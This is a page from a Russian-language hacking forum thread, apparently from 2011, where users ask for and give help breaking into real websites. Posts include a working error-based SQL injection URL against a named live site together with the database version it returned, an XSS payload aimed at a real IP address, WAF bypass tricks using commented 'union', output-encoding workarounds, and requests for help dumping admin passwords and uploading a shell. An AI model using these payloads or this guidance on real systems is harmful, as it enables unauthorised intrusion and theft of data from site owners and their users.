Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    Konqi, спасибо. Я вчера таки спать лег ))

    А можно еще вопрос? В посте #18193 Tigger пишет:
    Слово union взято в комментарии, почему же оно выполняется? И правильно ли я понимаю, что на сайте стоит фильтр, не позволяющий выполнять "union select", а вот "/*!union*/ select" уже не подпадает под него?
     
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf
     
    1 person likes this.
  3. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    select * from `mc-laren_oldforum`.table
     
    _________________________
  4. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Теоретически - можно.
    Кинь ф-цию translit.
     
    2 people like this.
  5. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    ggaffoltern[antigoogle].ch/index2.php?content=index&path=content&print=2
    Опять же инклуд. Как организовать читалку?
    ---------
    PHP:
    http://imakefood[antiggole].com/?sw=1[sql-code]
    WVS-ом насканил. Помогите раскрутить!
     
    #18005 Kuteke, 4 Oct 2011
    Last edited: 4 Oct 2011
  6. Ulitko

    Ulitko New Member

    Joined:
    12 Aug 2011
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    есть логи от mssql вида:
    INSERT INTO таблица (.....) values (.....);
    есть ли прога, в которую суешь эти логи, и она конвертит их в mysql ?
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://forum.antichat.ru/showpost.php?p=2850311&postcount=18201
     
  8. Demon_45

    Demon_45 New Member

    Joined:
    20 Sep 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Народ у вас было так нашел сайт в поисковике решил проверить на наличие XSS вбил
    и показывает

     
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    http://search.kgn.ru/?text=ololo

    Code:
    Warning: include(http:///?text=ololo) [function.include]: failed to open stream: operation failed in /var/www/search.kgn.ru/index.php on line 29
    
    А самому не додуматься что тут "не так"?
    Просто в конфигах не прописано к какому хосту обращаться для осуществления поиска. Поиск там работает не на самом сайте а через сторонний сервис и там даже написано "Поиск осуществлен с использованием Яndex.Server.".
     
  10. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Имхо, это не скуля.

    Нужен админский доступ - заюзай XSS лучше

    Code:
    http://217.8.80.55/?m[search]&search_block_num=<ScRiPt>alert(/Its XSS, Baby/)</ScRiPt>
     
    _________________________
  11. z0mbie86

    z0mbie86 Active Member

    Joined:
    25 Jul 2009
    Messages:
    38
    Likes Received:
    126
    Reputations:
    0
     
    #18011 z0mbie86, 5 Oct 2011
    Last edited: 5 Oct 2011
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Мне тока что с таким сообщением стукнули в аську, ДА МОЖНО, но прежде чем это сделать, нужно хотя бы пару статеек по скулям почитать и понять что к чему, скуля там очень простая:

    там фильтруются скобки, а вы навернека первым делом встевели что то типо version()

    вообщем вот ваше начало:
    а дальше хоть немножко напрегите свои извилены!
     
    _________________________
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(version())),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
    version(): 5.0.67
     
    _________________________
    1 person likes this.
  14. Leon2k

    Leon2k New Member

    Joined:
    25 May 2011
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Привет если есть кто умеет лить шелл отпишитесь в личку пожалуйста или аську в личку.
     
  15. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Доброго здравия форумчане!

    В общем ищу где можно почитать про PostgreSQL

    Нашёл такую скулю на сайте, а как попросить его показать мне пароль админа не знаю,
    Помогите убедить сайт.




    Leon2k

    Можешь обратиться в личку, всё что знаю расскажу!
     
  16. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Возможно, придётся поработать с выводом, чтото вроде

    Code:
    unhex(hex(%Visible_Col%)) или AES_DECRYPT(AES_ENCRYPT(%Visible_Col%,0x 71),0x71)
    где %Visible_Col% - выводимая колонка в запросе

    всё зависит от случая
     
    _________________________
  18. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    В любой статье по SQL-иньекциям.

    https://forum.antichat.ru/thread43966.html
    https://forum.antichat.ru/thread104591.html
     
  19. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    insert into помогите с injection

    запрос вида
    log.php?ver=1.0.1.130'

    Ошибка при занесении информации в базу.
    118 ******/log.php
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25
    INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }

    все параметры строковые, можно как то вставить union+select?
     
  20. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    https://forum.antichat.ru/showpost.php?p=2582303&postcount=16413
    Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.
     
    #18020 h00lyshit!, 7 Oct 2011
    Last edited: 7 Oct 2011
Thread Status:
Not open for further replies.